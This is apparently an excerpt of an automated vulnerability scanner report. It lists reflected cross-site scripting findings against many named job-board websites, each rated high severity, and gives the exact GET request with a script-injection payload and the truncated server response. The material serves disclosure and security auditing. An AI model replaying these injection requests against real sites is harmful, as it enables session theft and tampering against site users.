| HTTP/1.1 200 OK Date: Sat, 22 Jan 2011 01:24:45 GMT Server: Apache/2.2.3 (Red Hat) Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Set-Cookie: PHPSESSID=3j1g01ot7j Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:24:45 GMT Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:24:45 GMT Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:24:45 GMT Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:24:45 GMT Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:24:45 GMT Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:24:45 GMT Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:24:45 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 131635 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.mediajobc |
| Path: | / |
| GET /?444a4"><script>alert(1)< Host: www.mediajobcrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Sat, 22 Jan 2011 01:23:30 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=kmd4t8g4d1 Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:23:30 GMT Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:23:30 GMT Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:23:30 GMT Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:23:30 GMT Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:23:30 GMT Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:23:30 GMT Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:23:30 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 122756 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.militaryc |
| Path: | / |
| GET /?f0099"><script>alert(1)< Host: www.militarycrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:29:38 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=07205f964o Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:38 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:38 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:38 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:38 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:38 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:38 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:38 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 104794 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.nursingcr |
| Path: | / |
| GET /?3e967"><script>alert(1)< Host: www.nursingcrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Sat, 22 Jan 2011 01:24:05 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=gj77rk9bta Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:24:05 GMT Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:24:05 GMT Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:24:05 GMT Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:24:05 GMT Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:24:05 GMT Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:24:05 GMT Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:24:05 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 104462 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.occupatio |
| Path: | / |
| GET /?718c9"><script>alert(1)< Host: www.occupationalther Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 23:43:30 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=ntth3d6lga Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:43:30 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:43:30 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:43:30 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:43:30 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:43:30 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:43:30 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:43:30 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 106559 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.operation |
| Path: | / |
| GET /?c43e7"><script>alert(1)< Host: www.operationscrossing Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Sat, 22 Jan 2011 01:24:08 GMT Server: Apache/2.2.3 (Red Hat) Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=vmuk5k202a Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:24:08 GMT Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:24:08 GMT Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:24:08 GMT Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:24:08 GMT Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:24:08 GMT Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:24:08 GMT Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:24:08 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 118202 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.parttimec |
| Path: | / |
| GET /?74114"><script>alert(1)< Host: www.parttimecrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:29:19 GMT Server: Apache/2.2.3 (Red Hat) Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=autgq8pu82 Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:19 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:19 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:19 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:19 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:19 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:19 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:19 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 110622 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.pharmaceu |
| Path: | / |
| GET /?20b38"><script>alert(1)< Host: www.pharmaceuticalcr Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 23:43:29 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=mihqustv5s Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:43:29 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:43:29 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:43:29 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:43:29 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:43:29 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:43:29 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:43:29 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 119527 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.physicals |
| Path: | / |
| GET /?587a0"><script>alert(1)< Host: www.physicalsecurity Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Sat, 22 Jan 2011 01:22:58 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=6n27njhk9i Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:22:58 GMT Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:22:58 GMT Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:22:58 GMT Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:22:58 GMT Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:22:58 GMT Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:22:58 GMT Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:22:58 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 107084 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.physicalt |
| Path: | / |
| GET /?4a1b8"><script>alert(1)< Host: www.physicaltherapyc Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Sat, 22 Jan 2011 01:25:24 GMT Server: Apache/2.2.3 (Red Hat) Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=a8c9mu27ml Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:25:25 GMT Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:25:25 GMT Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:25:25 GMT Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:25:25 GMT Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:25:25 GMT Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:25:25 GMT Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:25:25 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 116184 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.planningc |
| Path: | / |
| GET /?131dd"><script>alert(1)< Host: www.planningcrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 23:38:19 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=j7ia85hmb3 Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:38:19 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:38:19 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:38:19 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:38:19 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:38:19 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:38:19 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:38:19 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 108746 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.postdocto |
| Path: | / |
| GET /?26245"><script>alert(1)< Host: www.postdoctoralfell Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 23:38:44 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=qpc1ersq5h Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:38:44 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:38:44 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:38:44 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:38:44 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:38:44 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:38:44 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:38:44 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 102797 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.prcrossing.com |
| Path: | / |
| GET /?18964"><script>alert(1)< Host: www.prcrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Sat, 22 Jan 2011 01:24:41 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=6orf3teb9u Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:24:41 GMT Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:24:41 GMT Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:24:41 GMT Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:24:41 GMT Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:24:41 GMT Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:24:41 GMT Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:24:41 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 120233 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.procureme |
| Path: | / |
| GET /?4e82f"><script>alert(1)< Host: www.procurementcrossing Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Sat, 22 Jan 2011 01:22:45 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=jse3n83urq Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:22:45 GMT Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:22:45 GMT Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:22:45 GMT Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:22:45 GMT Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:22:45 GMT Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:22:45 GMT Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:22:45 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 101054 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.productma |
| Path: | / |
| GET /?103c3"><script>alert(1)< Host: www.productmanagercr Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 23:42:54 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=6b3lghgc54 Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:54 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:54 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:54 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:54 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:54 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:54 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:54 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 106239 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.projectma |
| Path: | / |
| GET /?f3757"><script>alert(1)< Host: www.projectmanagemen Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 23:43:26 GMT Server: Apache/2.2.3 (Red Hat) Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=07nflqvoio Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:43:27 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:43:27 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:43:27 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:43:27 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:43:27 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:43:27 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:43:27 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 119192 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.publicint |
| Path: | / |
| GET /?446c3"><script>alert(1)< Host: www.publicinterestcr Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:29:40 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=tto0bf5j0s Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:40 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:40 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:40 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:40 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:40 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:40 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:40 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 104377 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.publishin |
| Path: | / |
| GET /?d1299"><script>alert(1)< Host: www.publishingcrossing Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 23:42:28 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=aiscpmneke Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:28 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:28 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:28 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:28 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:28 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:28 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:28 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 114371 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.purchasin |
| Path: | / |
| GET /?d28bb"><script>alert(1)< Host: www.purchasingcrossing Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 23:42:17 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=gmq6hirbm9 Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:17 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:17 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:17 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:17 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:17 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:17 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:17 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 105527 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.qaqccrossing |
| Path: | / |
